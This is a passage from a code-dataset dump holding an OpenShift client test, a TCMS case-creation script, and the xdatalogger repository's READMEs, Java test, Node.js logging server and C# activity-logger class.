'ssh_key_file=%s' >>%s\" %(self.ssh_key_path, self.conf_file_path),\n expect_return = 0)\n\n self.add_step(\"Update the default ssh key\",\n common.update_sshkey,\n function_parameters = [self.ssh_key_path + \".pub\",\n \"default\",\n self.user_email,\n self.user_passwd,\n \"--config %s\" %(self.conf_file_path)],\n expect_return=0)\n\n self.add_step(\"Get ssh key\", OSConf.get_sshkey)\n\n def compare_key(key1, key2):\n print \"Previous key fingerprint: %s\" %(key1)\n print \"New key fingerprint: %s\" %(key2)\n if key1 != key2:\n retcode = 12\n else:\n retcode = 0\n return retcode\n\n self.add_step(\"Compare key fingerprints\",\n compare_key,\n function_parameters=[\"__OUTPUT__[1][1]\", \"__OUTPUT__[8][1]\"],\n expect_return=12)\n\n test_libra_server = \"sldfkjasdlfkj\"\n self.add_step(\"Modify %s to use specified libra server\" %(self.conf_file_path),\n '''echo \"libra_server='%s'\" >>%s''' %(test_libra_server, self.conf_file_path),\n expect_return = 0)\n\n self.add_step(\"Run 'rhc domain show' to check libra server specifed in config file is being used\",\n \"rhc domain show -l %s -p '%s' --config %s -d %s\" % (self.user_email, self.user_passwd, self.conf_file_path, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_str = [\"https://%s\" % (test_libra_server)])\n\n self.run_steps()\n \n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SpecifyConfFile)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7837837934494019, "alphanum_fraction": 0.7837837934494019, "avg_line_length": 36, "blob_id": "2abc1cf00cd9a336e9bce1d72caafdd2ddfd78ce", "content_id": "10962a176f7d63243ebe6ab5d210363549876698", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37, "license_type": "no_license", "max_line_length": 36, "num_lines": 1, "path": "/automation/parallel/atest/varfile.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "VALUE_FROM_VAR_FILE='Expected Value'\n" }, { "alpha_fraction": 0.5464940667152405, "alphanum_fraction": 0.5505933165550232, "avg_line_length": 35.496063232421875, "blob_id": "68304e0616b15147ba92c7fcf35668c9aaca52f3", "content_id": "0259dedaa8a6ebeffe9358fa441269b5b42bede0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4635, "license_type": "no_license", "max_line_length": 79, "num_lines": 127, "path": "/automation/example_test/scripts/casecreate.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# casecreate.py is a script for case creating automatically\n# in TCMS via xml file\n#\n# Author: Xin Gao\n# Date: Dec 20, 2012\n#\n# If y don't know how to use this script, pls type following command,\n# python casecreate.py --help\n# If y have any other question, pls feel free to raise it to\n# [email protected]\n\n\nimport os\nimport sys\nfrom optparse import OptionParser\nimport xml.etree.ElementTree as ET\n\nfrom nitrate import NitrateKerbXmlrpc\n\n\ndef get_options():\n '''Setting up the run env and other parameters'''\n\n usage = '''usage: python %prog [-td] -p\n Example: python casecreate.py -t -p 7656 -d ~/plan/vaultcase.xml'''\n parser = OptionParser(usage)\n parser.add_option('-t', action='store_true', dest='is_test',\n help='create cases to tcms-stage. \\\n default is to production env.')\n parser.add_option('-p', '--plan_id', type='int', dest='plan_id',\n help='Plan id, this is a mandatory parameter!!!')\n parser.add_option('-d', '--directory', dest='xml_file',\n default=os.getcwd() + './testplan.xml',\n help='IEEE_TestPlan file path: \\\n such as, ~/plan/vaultcase.xml, \\\n default value is ./testplan.xml')\n (options, args) = parser.parse_args()\n is_test = options.is_test\n plan_id = options.plan_id\n xml_file = options.xml_file\n base_url = ''\n if is_test:\n base_url = 'https://tcms-stage.englab.bne.redhat.com'\n else:\n base_url = 'https://tcms.engineering.redhat.com'\n tcmsrpc = NitrateKerbXmlrpc(base_url + '/xmlrpc/').server\n if not plan_id:\n parser.error(\"'-p' is a mandatory parameter, and the type is 'int'!\")\n\n return tcmsrpc, plan_id, xml_file\n\n\ndef get_category_id(tcmsrpc, plan_id):\n '''Get the category_id of \"--default--\",\n\n if there's no \"--default--\" category,\n raise warning about adding \"--default--\" category'''\n product_name = tcmsrpc.TestPlan.get(plan_id)['product']\n try:\n category_id = tcmsrpc.Product.check_category('--default--',\n product_name)['id']\n except Exception, error_info:\n print error_info\n sys.exit(\"!!!!!'--default--' category does not exist!!!!!\\n \\\n pls add that category on web TCMS.\")\n\n return category_id\n\n\ndef get_cases(xml_file):\n '''Getting all cases info from xml file'''\n\n cases = []\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for testcase in root.findall('testcase'):\n case = {}\n case['summary'] = testcase.get('case_name')\n case['priority'] = testcase.get('case_priority')\n case['tag'] = testcase.get('case_tag')\n case['notes'] = testcase.find('notes').text\n case['action'] = testcase.find('action').text\n case['expectedresults'] = testcase.find('expectedresults').text\n case['setup'] = testcase.find('setup').text\n case['breakdown'] = testcase.find('breakdown').text\n cases.append(case)\n return cases\n\n\ndef create_cases(tcmsrpc, plan_id, cases):\n '''Create new cases'''\n # get category_id, and product_id\n category_id = get_category_id(tcmsrpc, plan_id)\n product_id = tcmsrpc.TestPlan.get(plan_id)['product_id']\n num = 0\n for case in cases:\n num += 1\n case_setup = case['notes'] + case['setup']\n case_value = {\n 'plan': plan_id,\n 'category': category_id,\n 'product': product_id,\n 'summary': case['summary'],\n 'priority': int(case['priority'][1]),\n 'tag': case['tag'],\n 'setup': '<pre>' + case_setup + '</pre>',\n 'action': '<pre>' + case['action'] + '</pre>',\n 'effect': '<pre>' + case['expectedresults'] + '</pre>',\n 'setup': '<pre>' + case_setup + '</pre>',\n 'breakdown': '<pre>' + case['breakdown'] + '</pre>'}\n new_case = tcmsrpc.TestCase.create(case_value)\n case_id = new_case['case_id']\n print 'created case%d, case_id: %d, summary is: %s' \\\n % (num, case_id, case['summary'])\n\n\nif __name__ == '__main__':\n # Get env, plan_id, and xml file path\n (tcmsrpc, plan_id, xml_file) = get_options()\n\n # Get other case info for case creating\n cases = []\n cases = get_cases(xml_file)\n\n # create Cases via xml file\n create_cases(tcmsrpc, plan_id, cases)\n print '=' * 50, '\\n', 'DONE'.center(50, '='), '\\n', '=' * 50\n" } ]
502
draperlab/xdatalogger
https://github.com/draperlab/xdatalogger
2a1eecc613ace77e5bfaa412cca1e330f84b72b0
8be459602739fc591fe54dbc54950dd84c69b2ac
5c44f64f8189a9d18aa363ef4bac67d6945f6ea7
refs/heads/master
2021-01-25T04:02:09.690612
2014-06-25T19:16:39
2014-06-25T19:16:39
13,988,935
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.655940592288971, "alphanum_fraction": 0.6670792102813721, "avg_line_length": 20.864864349365234, "blob_id": "68e1f0f6d88fccbcf99c59b2610e697d5aeb30a5", "content_id": "aaeb0eaf315c57dd3dc1262347c30d1e8967f6c7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 808, "license_type": "permissive", "max_line_length": 89, "num_lines": 37, "path": "/examples/README.md", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "#Examples\n\nLoad `jstest.html` in any modern browser and open the console to view events being fired.\n\n### Instantiation and Registration\n```javascript\nvar ac = new activityLogger().echo(true).testing(true);\nac.registerActivityLogger('http://localhost:3000', 'demo', '0.1')\n```\n\n### Logging Method A\n```javascript\nd3.select(\"#order-cost\")\n.on(\"click\", function () {\n home.order = \"cost\";\n home.update();\n ac.logUserActivity(\"Reorder Bar Chart by Cost\", \"sort_data\", ac.WF_EXPLORE);\n});\n})\n```\n\n### Logging Method B\n```javascript\nac.tag('#sl1', {\n\tevents: ['mouseenter', 'mouseleave', 'change'],\n\twf_state: ac.WF_EXPLORE,\n\tactivity: 'select_option',\n\tdesc: 'User selected option from list'\n})\n```\n\n### Logging Method C\n```html\n<li class=\"dropdown draper\" data-wf='4' data-activity='select'>\n ...\n</li>\n```" }, { "alpha_fraction": 0.7307294607162476, "alphanum_fraction": 0.7364200949668884, "avg_line_length": 37.28712844848633, "blob_id": "cd90bfa422bbb1f27f739764e5be0180a91be6ad", "content_id": "c16f91b93a65e0884788c0a962c180a0b422c7dc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3866, "license_type": "permissive", "max_line_length": 262, "num_lines": 101, "path": "/README.md", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "# Draper XDATA Activity Logger\n\nThe Draper XDATA activity logger, is a collection of helper libraries for XDATA performers, to aid in recording the behaviors of the analysts using the tools.\n\n## JavaScript\n\n### Create Activity Logger Object\n\nThere should be 1 activityLogger per application. The activity logger object will maintain session specific information that will be logged to Draper's servers.\n\n\n```javascript\n// Standard\nvar ac = new activityLogger();\n\n// Echo logging in console\nvar ac = new activityLogger().echo(true);\n\n// Mute USER and SYS actions\nvar ac = new activityLogger().mute(['SYS', 'USER']);\n\n// Testing: will not contact Draper Server\nvar ac = new activityLogger().testing(true);\n\n// are chainable\nvar ac = new activityLogger().echo(true).testing(true);\n```\n\n### Register Logger\n\nRegistering the logger requires the logging server URL, the name of your component, and a component version to aid in differencing logs from components that are changed as they become more developed.\n\nRegistering with Draper's server is a blocking call, and ensures that a sessionID is registered with the logger.\n```javascript\nac.registerActivityLogger(\"http://localhost:3000\", \"KitwareHospitalCosts\", \"0.1\");\n```\n\n### Logging a USER Action\n\nA User action requires 3 elements.\n* A natural language description of the action\n* A one word action description that should be repeated across tool\n* A workflow state (more information below)\n\nThere are currently 3 methods available to log USER events, examples of each are shown below.\n\n#### Logging Method A\n```javascript\nd3.select(\"#order-cost\")\n.on(\"click\", function () {\n home.order = \"cost\";\n home.update();\n ac.logUserActivity(\"Reorder Bar Chart by Cost\", \"sort_data\", ac.WF_EXPLORE);\n});\n})\n```\n\n#### Logging Method B\n```javascript\nac.tag('#sl1', {\n\tevents: ['mouseenter', 'mouseleave', 'change'],\n\twf_state: ac.WF_EXPLORE,\n\tactivity: 'select_option',\n\tdesc: 'User selected option from list'\n})\n```\n\n#### Logging Method C\n```html\n<li class=\"dropdown draper\" data-wf='4' data-activity='select'>\n ...\n</li>\n```\n\n#### Workflow States\nThe following list contains the 7 workflow states we are interested in monitoring. Within each workflow state there are a set of actions we anticipate the users doing. Developers are welcome to create more if the action they wish to record is not in this list.\n\n0. **WF_OTHER** - The action does not correspond to any workflow state. Please contact Draper for guidance.\n1. **WF_DEFINE** - define_hypothesis\n2. **WF_GETDATA** - write_query, select_option, execute_query, monitor_query\n3. **WF_EXPLORE** - browse, pan, zoom, scale, rotate, filter, drill, select, crossfilter, scroll, read (including mouse popovers), listen (if audio), watch (if imagery / video), toggle_option, highlight, sort_data, select_data, down_select_data, filter_data\n4. **WF_CREATE** - create_visualization, define_axes, define_chart_type, define_table, move_window, resize_window, set_color_palette, select_layers, {add,remove,split,merge}_{rows,columns}, arrange_windows\n5. **WF_ENRICH** - add_note, bookmark_view, label\n6. **WF_TRANSFORM** - denoise, detrend, pattern_search, do_math, transform_data, coordinate_transform\n\n-------------\n\n### Logging a SYS Action\nThe logging of system actions are aimed to log those events that are not explicitly triggered by the user, as well as measure any latency in the system. \n\nFor example, when a user enters a query and hits submit, a USER action is fired. When the query results are returned 10s later, a SYS action should be fired to record that new data has arrived. \n\nAn example of this is below:\n```javascript\nac.logUserActivity(\"asking server for data\", \"execute_query\", ac.WF_GETDATA);\n\n$.getJSON('https://my_endpoint/get_data', data, function(data) {\n\tac.logSysActivity('received data from server');\n\t$(\"#result\").text(data.result);\n})\n```" }, { "alpha_fraction": 0.6552363038063049, "alphanum_fraction": 0.6997219920158386, "avg_line_length": 31.696969985961914, "blob_id": "94b665290571fca50b310a58e35c85ca56f95b4d", "content_id": "baa333550016fe2fb931a3eeced533f4aa2bbeae", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1079, "license_type": "permissive", "max_line_length": 95, "num_lines": 33, "path": "/java/ActivityLoggerTest.java", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport org.draper.ActivityLogger;\n\npublic class ActivityLoggerTest {\n\n\n\tpublic static void main(String [ ] args){\n\t\tActivityLogger ac = new ActivityLogger();\n\t\tac.registerActivityLogger(\"http://127.0.0.1:1337\");\n\n\t\tac.componentName = \"pyTestComp\";\n\t\tac.componentVersion = \"34.87\";\n\t\t//ac.echoLogsToConsole = true;\n\t\tHashtable<String, Object> meta1 = new Hashtable<String, Object>();\n\t\tmeta1.put(\"testQuant\", 3);\n\t\tmeta1.put(\"testQual\", \"quall\");\n\t\t\n\t\tfor(int i = 0; i<10; i++){\n\t\tac.logSystemActivity(\"TEST SYSTEM MESSAGE\");\n\t\tSystem.out.println();\n\t\tac.logSystemActivity(\"TEST SYSTEM MESSAGE\", meta1);\n\t\tSystem.out.println();\n\t\tac.logUserActivity(\"TEST USER MESSAGE\" , \"scaleHistogram\", ActivityLogger.WF.COLLABORATE);\n\t\tSystem.out.println();\n\t\tac.logUserActivity(\"TEST USER MESSAGE\" , \"scaleHistogram\", ActivityLogger.WF.MARSHAL, meta1);\n\t\tSystem.out.println();\n\t\tac.logUILayout(\"TEST UI LAYOUT\", \"Viz Element\", true, 200, 450, 200, 500);\n\t\tSystem.out.println();\n\t\tac.logUILayout(\"TEST UI LAYOUT\", \"Viz Element\", true, 200, 450, 200, 500, meta1);\n\t\t}\n\t}\n\n}\n" }, { "alpha_fraction": 0.7278106212615967, "alphanum_fraction": 0.7396449446678162, "avg_line_length": 29.772727966308594, "blob_id": "68873906272e074a9a4022b2e291841f5a1d0228", "content_id": "5acfb702e161738a82ddb3c6753a3506bf7d08a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 676, "license_type": "permissive", "max_line_length": 161, "num_lines": 22, "path": "/server/README.md", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "#Draper Logging Server\n\nThe Draper Logging Server is a lightweight Node.js server written using the Express.js package. There are some dependencies, including optimist.js and mongo.js.\n\n\n## Quick Start\n\n The quickest way to get started with the Draper Logging server is to execute `server` as shown below:\n\nInstall dependencies:\n\n $ npm install\n\n Start the server:\n \n $ node server.js\n\n## Details\n\n * By default runs on 0.0.0.0:1337, port can be altered by using the --port flag\n * Expects to already have `mongod` running and will look for the db xdata by default, this can be altered by using the --host flag\n * Expects the mongo collection `logs` under the db." }, { "alpha_fraction": 0.6548625826835632, "alphanum_fraction": 0.6612050533294678, "avg_line_length": 22.073171615600586, "blob_id": "1c6e57bd6d500d4e280603cf03dc9af127227110", "content_id": "6f1fc78e8864728d209492c08c5af2dc51efdfed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1892, "license_type": "permissive", "max_line_length": 78, "num_lines": 82, "path": "/server/server.js", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "#!/usr/bin node\n/**\n* Draper Logging Server\n*\n* This is a simple lightweight server that handles the registration of logging\n* sessions and receives logs and passes them to a local MongoDB.\n*\n* @author Draper Laboratory\n* @date 2014\n*/\n\n/**\n * Module dependencies.\n */\nvar express = require('express');\nvar db = require(\"mongojs\");\nvar argv = require(\"optimist\").argv;\n\nvar host = \"xdata\",\nport = \"1337\";\n\nif (!!argv.host) {\n\thost = argv.host;\n}\nif (!!argv.port) {\n\tport = argv.port;\n}\n\n// MongoDB interface\nvar databaseUrl = \"xdata\"; // \"username:[email protected]/mydb\"\nvar collections = [\"logs\", \"sessions\"]\ndb = db.connect(databaseUrl, collections);\n\nvar app = express();\napp.use(express.bodyParser());\n\n// endpoint to receive logs\napp.post('/send_log', function(req, res){\n\tconsole.log('recieved log')\n\tvar data = req.body; \n console.log(data)\n data.timestamp = new Date(data.timestamp)\n console.log(data)\n db.logs.insert(data, function (err, result) {\n \n // Allow CORS\n var origin = (req.headers.origin || \"*\");\n res.header(\"Access-Control-Allow-Origin\", origin);\n res.json({}); \t\nres.end()\n });\n});\n\napp.get('/session', function(req, res){\n\tconsole.log('query:', req.query)\n});\n\n// endpoint to register session\napp.get('/register', function(req, res){\n\tconsole.log('registering session', req.connection.remoteAddress)\n\tvar client_ip = req.connection.remoteAddress\n var data = {client_ip: client_ip};\n\tconsole.log(data);\n db.sessions.insert(data, function (err, result) {\n \n // Allow CORS\n var origin = (req.headers.origin || \"*\");\n res.header(\"Access-Control-Allow-Origin\", origin);\n\n console.log(result, result._id)\n \tres.json({\n\t\t\tsession_id: result._id,\n\t\t\tclient_ip: req.connection.remoteAddress\n\t\t})\n res.end()\n\t}) \n});\n\n// run server\nvar serverAddress = '0.0.0.0';\napp.listen(+port, serverAddress);\nconsole.log('Listening on port ' + port);\n" }, { "alpha_fraction": 0.6046372056007385, "alphanum_fraction": 0.6085702776908875, "avg_line_length": 51.65483093261719, "blob_id": "a0092c5b17cf6c8d199dec90e92ed9cb29130405", "content_id": "049d61f4e9c237dfa87e4bb1f68827c91bcc03f9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 26699, "license_type": "permissive", "max_line_length": 233, "num_lines": 507, "path": "/csharp/ActivityLogger.cs", "repo_name": "draperlab/xdatalogger", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\n\nnamespace Activity_Logging_API_Helper\n{\n /*\n\t * ++++++++++++++++++\n * C# Activity Logger\n * ++++++++++++++++++\n\t * \n\t * Draper Laboratory, June 2013\n\t * ----------------------------\n * \n\t * \n\t * This library is intended for integration into a C# software application which is implementing the Draper \n\t * Activity Logging API. To send activity log messages using this libary, components must:\n * \n\t * \t1. Instantiate an ``ActivityLogger`` object\n\t * \t2. Call ``registerActivityLogger(...)`` to pass in required networking \n\t * \t and version information.\n\t * \t3. Call one of the logging functions:\n\t * \t\t* ``logSystemActivity(...)``\n\t * \t\t* ``logUserActivity(...)``\n\t * \t\t* ``logUILayout(...)``\n\t * \n\t * An example use of this library is included below::\n * \n\t * \t //Instantiate the Activity Logger\n\t * \t ac = ActivityLogger.ActivityLogger();\n * \n * //Get the the current UTC time, and store it as an ISO-compliant timestamp string.\n * String ISOTime = DateTime.UtcNow.ToString(\"O\");\n * \n\t * \t //Minimally register the logger (DISCOURAGED). In this case, we register our logger with client hostname\n * \t //\"3D Viz Tablet 001\", which is the name of the hardware device on which this application is running.\n * \t //No other arguments are supplied, so the software component name will be logged as unknownComponent, the \n * \t //component version will be unknown,and the User Session ID will be a random integer.\n * \n * ac.registerActivityLogger(\"Viz_Tablet_001\");\n * \n * //Re-register the logger. In this case, we register our logger object with client hostname\n * \t //\"Viz_Tablet_001\". We specify that the application sending logs is version 34.87 of the application \n * \t //\"c-Sharp Test App\", and the User Session ID is \"AC34523452345\".\n * \t \n * c.registerActivityLogger(\"Viz_Tablet_001\", \"cSharpTestApp\", \"34.87\", \"AC34523452345\");\n * \n * //Send a System Activity Message. In this case, we send a System Activity message with the current UTC\n * //timestamp and the action description \"Pushed query results to GUI\"\n *\n * ac.logSystemActivity(ISOTime, \"Pushed query results to GUI\");\n * \n * //Send a System Activity Message with optional metadata included. In this case, we send a System Activity\n * //message with the current UTC timestamp, the action description \"Pushed query results to GUI\" and \n * //optional metadata with two key-value pairs of:\n * // 'rowsReturned'=314\n * // 'queryTime'='422 ms'\n * \n * Dictionary<String,String> testDict = new Dictionary<String, String>();\n * testDict.Add(\"rowsReturned\", \"314\");\n * testDict.Add(\"queryTime\", \"422 ms\");\n * ac.logSystemActivity(ISOTime, \"Pushed query results to GUI\", testDict);\n * \n * //Send a User Activity Message. In this case, we send a User Activity message with the current UTC \n * //timestamp, the action description \"Filtered results using a Histogram view\", a developer-defined user \n * //action visualFilter_Histogram, and the workflow constant SEARCH, defined in the Draper Activity Logging\n * //API.\n * \n * \t\tac.logUserActivity(ISOTime, \"Filtered results using a Histogram view\" , \"visualFilter_Histogram\", \n * \t\t ActivityLogger.WF.MARSHAL);\n * \t \n * //Send a UI Layout Message. In this case, we send a UI Layout message with the current UTC timestamp, \n * //action description of \"Expand Tree Node\". The name of the UI element is \"Cluster_Browser_List\", \n * //visibility=true, meaning SearchWindow A is currently visible. The left, right, top and bottom bounds of\n * //the UI element are 200px, 450px, 200px, and 500px from the top right of the screen.\n * \n * Console.Write(ac.logUILayout(ISOTime, \"Expand Tree Node\", \"Cluster_Browser_List\", true, 200, 450, 200, \n * 500)) ; \n */\n class ActivityLogger\n {\n /// <summary>\n /// The name of the computer or VM on which the software component using this library is runing. In the case of\n ///a server-side Python component, this should be the host name of the machine on which the Python service is\n ///running. By default, this field will be populated with the IP address of the machine on which this module is \n ///executed.\n ///\n ///Ideally, this hostname should describe a physical terminal or experimental setup as persistently as possible.\n /// </summary>\n String clientHostname;\n\n //The name of the software component or application sending log messages from this library. Defaults to \n //``unknownComponent``\n String componentName = \"unknownComponent\";\n\n //The version number of the software component or application specified in ``clientHostname`` that is sending log\n //messages from this library. Defaults to ``unknown``.\n String componentVersion = \"unknown\";\n\n //The unique session ID used for communication between client and sever-side software components during use of \n //this component. Defaults to a random integer.\n //\n //Ideally, this session ID will identify log messages from all software components used to execute a unique user \n //session.\n int sessionID;\n\n\n public ActivityLogger()\n {\n Random randomNumberGen = new Random();\n sessionID = randomNumberGen.Next(1, 10000);\n }\n\n /*\n INTERNAL CONSTANTS\n ******************\n * These constant define values associated with this specific version of this library, and should not be \n * changed by the implementor.\n */\n\n //The version number of the Draper Activity Logging API implemented by this library.\n private int apiVersion = 2;\n\n //The workflow coding version used by this Activity Logging API.\n private int workflowCodingVersion = 1;\n\n //WORKFLOW CODES\n\n //These constants specify the workflow codes defined in the Draper Activity Logging API version <apiVersion>. One of \n //these constants *must* be passed in the parameter ``userWorkflowState``\tin the function ``logUserActivity``. \n\n public enum WF\n {\n OTHER = 0,\n PLAN = 1,\n SEARCH = 2,\n EXAMINE = 3,\n MARSHAL = 4,\n REASON = 5,\n COLLABORATE = 6,\n REPORT = 7\n }\n\n //The language in which this helper library is implemented\n String implementationLanguage = \"C#\";\n\n // END INTERNAL CONSTANTS\n // **********************\n\n\n /*======================== REGISTRATION ============================\n * These variables are assigned by calling the \n * <registerActivityLogger> function below. They are persistent until\n * a new ActivityLogger object is instantiated, or until modification\n * by the <registerActivityLogger> function. \n */\n\n /// <summary>\n /// Register this event logger. <registerActivityLogger> MUST be called before log messages can be sent with \n /// this library. \n /// </summary>\n /// <param name=\"clientHostnameIN\">The hostname or IP address of this machine or VM. See documentation for\n /// <clientHostname> below. If not provided, defaults to the public IP address of this computer.</param>\n /// <param name=\"componentNameIN\">The name of the app or component using this library. See documentation for \n /// <componentName> below. If not provided, defaults to the hostname of the web app that loaded this \n /// library.</param>\n /// <param name=\"componentVersionIN\">The version of this app or component. See documentation for \n /// <componentVersion> below. If not provided, defaults to 'unknown'.</param>\n /// <param name=\"sessionIdIN\">A unique ID for the current user session. See documentation for <sessionID>\n /// below. If not provided, defaults to a random integer.</param>\n\n public void registerActivityLogger(String clientHostnameIN, String componentNameIN = null, String componentVersionIN = null,\n int sessionIdIN = -1)\n {\n if (componentNameIN != null)\n {\n componentName = componentNameIN;\n }\n\n\n if (componentVersionIN != null)\n {\n componentVersion = componentVersionIN;\n }\n\n if (sessionIdIN != -1)\n {\n sessionID = sessionIdIN;\n }\n\n clientHostname = clientHostnameIN;\n }\n\n //========================END REGISTRATION==========================\n\n\n /*==================ACTIVITY LOGGING FUNCTIONS======================\n * The 3 functions in this section are used to send Activity Log Mesages to an Activity Logging Server. \n * Seperate functions are used to log System Activity, User Activity, and UI Layout Events. See the Activity \n * Logging API by Draper Laboratory for more details about the use of these messages.\n */\n\n /// <summary>\n /// Log a System Activity, with nested metadata.\n /// </summary>\n /// <remarks> <see cref=\"registerActivityLogger\"/> **must** be called before calling this function. Use <code>logSystemActivity</code> to log \n /// software actions that are not explicitly invoked by the user. For example, if a software component refreshes a \n /// data store after a pre-determined time span, the refresh event should be logged as a system activity. However, \n /// if the datastore was refreshed in response to a user clicking a Reshresh UI element, that activity should NOT be\n /// logged as a System Activity, but rather as a User Activity, with the method <see cref=\"logUserActivity\"/>.\n /// </remarks>\n /// <param name=\"ISOTimestamp\">An ISO-compliant Timestamp string, in UTC.</param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView component refreshed datasource\"</example></param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity.</param>\n /// <returns>A JSON message.</returns>\n public String logSystemActivity(String ISOTimestamp, String actionDescription, Dictionary<String, String> softwareMetadata = null)\n {\n Dictionary<String, object> recastMetaData = null;\n if (softwareMetadata != null)\n {\n recastMetaData = new Dictionary<string, object>();\n foreach (String key in softwareMetadata.Keys)\n {\n recastMetaData.Add(key, softwareMetadata[key]);\n }\n }\n\n return logSystemActivity<Object>(ISOTimestamp, actionDescription, recastMetaData);\n }\n /// <summary>\n /// Log a System Activity.\n /// </summary>\n /// <remarks> <see cref=\"registerActivityLogger\"/> **must** be called before calling this function. Use <code>logSystemActivity</code> to log \n /// software actions that are not explicitly invoked by the user. For example, if a software component refreshes a \n /// data store after a pre-determined time span, the refresh event should be logged as a system activity. However, \n /// if the datastore was refreshed in response to a user clicking a Reshresh UI element, that activity should NOT be\n /// logged as a System Activity, but rather as a User Activity, with the method <see cref=\"logUserActivity\"/>.\n /// </remarks>\n /// <param name=\"ISOTimestamp\">An ISO-compliant Timestamp string, in UTC.</param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView component refreshed datasource\"</example></param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity.</param>\n /// <returns>A JSON message.</returns>\n public String logSystemActivity<T>(String ISOTimestamp, String actionDescription, Dictionary<String, T> softwareMetadata = null)\n {\n Dictionary<string,object> SystemActivityMessage = new Dictionary<string,object>();\n\n writeHeader(SystemActivityMessage);\n\n SystemActivityMessage.Add(\"timestamp\", ISOTimestamp);\n\n SystemActivityMessage.Add(\"type\",\"SYSACTION\");\n\n Dictionary<string, object> parms = new Dictionary<string, object>();\n parms.Add(\"desc\", actionDescription);\n SystemActivityMessage.Add(\"parms\", parms);\n\n SystemActivityMessage.Add(\"metadata\",softwareMetadata);\n\n return convertToJSON(SystemActivityMessage);\n }\n /// <summary>\n /// Log a User Activity.\n /// </summary>\n /// <param name=\"ISOTimestamp\"></param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView component refreshed datastore.\"</example></param>\n /// <param name=\"userActivity\">A key word defined by each software component or application indicating which \n /// software-centric function is is most likely indicated by the this user activity. See the Activity Logging \n /// API for a standard set of user activity key words. </param>\n /// <param name=\"userWorkflowState\">\n /// This value must be one of the Workflow Codes defined in this library. See the Activity Logging API \n /// for definitions of each workflow code. Example:\n /// <example> \n /// ac = new ActivityLogger();\n /// ...\n /// userWorkflowState = ac.WF.SEARCH\n /// </example>\n /// </param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity.</param>\n /// <returns>A JSON log message.</returns>\n /// <remarks>\n /// <see cref=\"registerActivityLogger\"/> MUST be called before calling this function. Use <code>logUserActivity</code>\n /// to log actions initiated by an explicit user action. For example, if a software component refreshes a \n /// data store when the user clicks a Reshresh UI element, that activity should be logged as a User Activity.\n /// However, if the datastore was refreshed automatically after a certain time span, that activity should NOT\n /// be logged as a User Activity, but rather as a System Activity.\n /// </remarks>\n public String logUserActivity(String ISOTimestamp, String actionDescription, String userActivity, WF userWorkflowState, Dictionary<String, String> softwareMetadata = null)\n {\n Dictionary<String, object> recastMetaData = null;\n if (softwareMetadata != null)\n {\n recastMetaData = new Dictionary<string, object>();\n foreach (String key in softwareMetadata.Keys)\n {\n recastMetaData.Add(key, softwareMetadata[key]);\n }\n }\n\n return logUserActivity<Object>(ISOTimestamp, actionDescription, userActivity, userWorkflowState, recastMetaData);\n }\n /// <summary>\n /// Log a User Activity, with optionally nested metadata.\n /// </summary>\n /// <param name=\"ISOTimestamp\"></param>\n /// <param name=\"actionDescription\">A string describing the System Activity performed by the component. Example: \n /// <example>\"BankAccountTableView component refreshed datastore.\"</example></param>\n /// <param name=\"userActivity\">A key word defined by each software component or application indicating which \n /// software-centric function is is most likely indicated by the this user activity. See the Activity Logging \n /// API for a standard set of user activity key words. </param>\n /// <param name=\"userWorkflowState\">\n /// This value must be one of the Workflow Codes defined in this library. See the Activity Logging API \n /// for definitions of each workflow code. Example:\n /// <example> \n /// ac = new ActivityLogger();\n /// ...\n /// userWorkflowState = ac.WF.SEARCH\n /// </example>\n /// </param>\n /// <param name=\"softwareMetadata\">Any key/value pairs that will clarify or paramterize this system activity. These values can be nested.</param>\n /// <returns>A JSON log message.</returns>\n /// <remarks>\n /// <see cref=\"registerActivityLogger\"/> MUST be called before calling this function. Use <code>logUserActivity</code>\n /// to log actions initiated by an explicit user action. For example, if a software component refreshes a \n /// data store when the user clicks a Reshresh UI element, that activity should be logged as a User Activity.\n /// However, if the datastore was refreshed automatically after a certain time span, that activity should NOT\n /// be logged as a User Activity, but rather as a System Activity.\n /// </remarks>\n public String logUserActivity<T>(String ISOTimestamp, String actionDescription, String userActivity, WF userWorkflowState, Dictionary<String, T> softwareMetadata = null)\n {\n Dictionary<String, Object> UserActivityMessage = new Dictionary<string, object>();\n\n writeHeader(UserActivityMessage);\n\n UserActivityMessage.Add(\"timestamp\", ISOTimestamp);\n 